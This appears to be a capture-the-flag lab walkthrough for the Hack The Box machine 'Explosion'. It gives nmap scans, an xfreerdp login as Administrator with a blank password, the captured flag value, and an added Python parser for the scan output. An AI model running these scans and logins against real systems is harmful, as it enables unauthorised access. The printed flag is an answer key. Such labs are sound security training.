05.EXPLOSION (RDP)
Programming, RDP, Reconnaissance, Weak Credentials
Last updated
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
root@htb:~$ nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services //this is RDP
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 3389
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: EXPLOSION
| NetBIOS_Domain_Name: EXPLOSION
| NetBIOS_Computer_Name: EXPLOSION
| DNS_Domain_Name: Explosion
| DNS_Computer_Name: Explosion
| Product_Version: 10.0.17763
|_ System_Time: 2025-01-30T01:19:05+00:00
| ssl-cert: Subject: commonName=Explosion
| Not valid before: 2025-01-29T01:12:11
|_Not valid after: 2025-07-31T01:12:11
|_ssl-date: 2025-01-30T01:19:05+00:00; +1m38s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1m37s, deviation: 0s, median: 1m37s
* the -sC flag runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
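The rdp-ntlm-info block above is useful beyond the flag: it tells you, before any credential is tried, that the host answers RDP, which OS build it runs and that it is not domain-joined. Below is an added Python example (not part of the original notes) that parses a constructed, trimmed copy of that nmap output and turns it into review findings; the regexes and field names are assumptions based on the output format shown above.

```python
import re

# Constructed sample: the nmap -sV -sC -p 3389 output from the notes above (trimmed).
NMAP_OUTPUT = """\
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: EXPLOSION
|   NetBIOS_Domain_Name: EXPLOSION
|   NetBIOS_Computer_Name: EXPLOSION
|   Product_Version: 10.0.17763
|_  System_Time: 2025-01-30T01:19:05+00:00
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
KV_RE = re.compile(r"^\|[_ ]\s*([A-Za-z_]+):\s*(.+)$")

def parse_rdp_scan(text):
    """Parse nmap port lines plus any rdp-ntlm-info script block under them."""
    ports, current, in_ntlm = [], None, False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:  # new port entry; any script block that follows belongs to it
            current = {"port": int(m.group(1)), "state": m.group(3),
                       "service": m.group(4), "ntlm_info": {}}
            ports.append(current)
            in_ntlm = False
        elif current is not None and line.startswith("| rdp-ntlm-info:"):
            in_ntlm = True
        elif in_ntlm:
            kv = KV_RE.match(line)
            if kv:
                current["ntlm_info"][kv.group(1)] = kv.group(2).strip()
            in_ntlm = not line.startswith("|_")  # "|_" is nmap's last line of a block
    return ports

def assess(ports):
    """Defender-side findings from the parsed scan; nothing here touches the host."""
    findings = []
    for p in ports:
        if p["service"] != "ms-wbt-server" or p["state"] != "open":
            continue
        findings.append("RDP exposed on %d/tcp" % p["port"])
        info = p["ntlm_info"]
        if info:
            findings.append("pre-auth NTLM info disclosed: host=%s build=%s" % (
                info.get("NetBIOS_Computer_Name"), info.get("Product_Version")))
            if info.get("NetBIOS_Domain_Name") == info.get("NetBIOS_Computer_Name"):
                findings.append("not domain-joined: local accounts are the logon surface")
    return findings
```

Run `assess(parse_rdp_scan(NMAP_OUTPUT))` to get the three findings for this box; feed it the full `-p-` output and only the RDP entry is reported.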
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 3389
3389/tcp open ms-wbt-server
* --script=vuln runs scripts that focus specifically on detecting known
vulnerabilities in the service running on the scanned port (3389 here)
- e.g., weak configurations, or known vulnerabilities in the RDP service
- if no results are found, the service may be fully patched (or simply not covered by any vuln script)
root@htb:~$ which xfreerdp
root@htb:~$ xfreerdp -h
* /v:<server>[:port] Server hostname
root@htb:~$ xfreerdp /v:{targetIP}
* this uses the attacker's own username as the login username for the RDP
session, thus testing guest login capabilities.
- this is NOT an OPSEC-safe method: do not use this!
root@htb:~$ xfreerdp /v:{targetIP} /cert:ignore /u:Administrator
password: {blank}
- it is uncommon to find a blank password for RDP connections, but worth a try
* /cert:ignore skips verification of the server's TLS certificate for this connection
* /u:Administrator specifies the login username
PS C\target> cd C:\Users\Administrator\Desktop
PS C\target> Get-Content .\flag.txt
* 951fa96d7830c451b536be5a6be008a0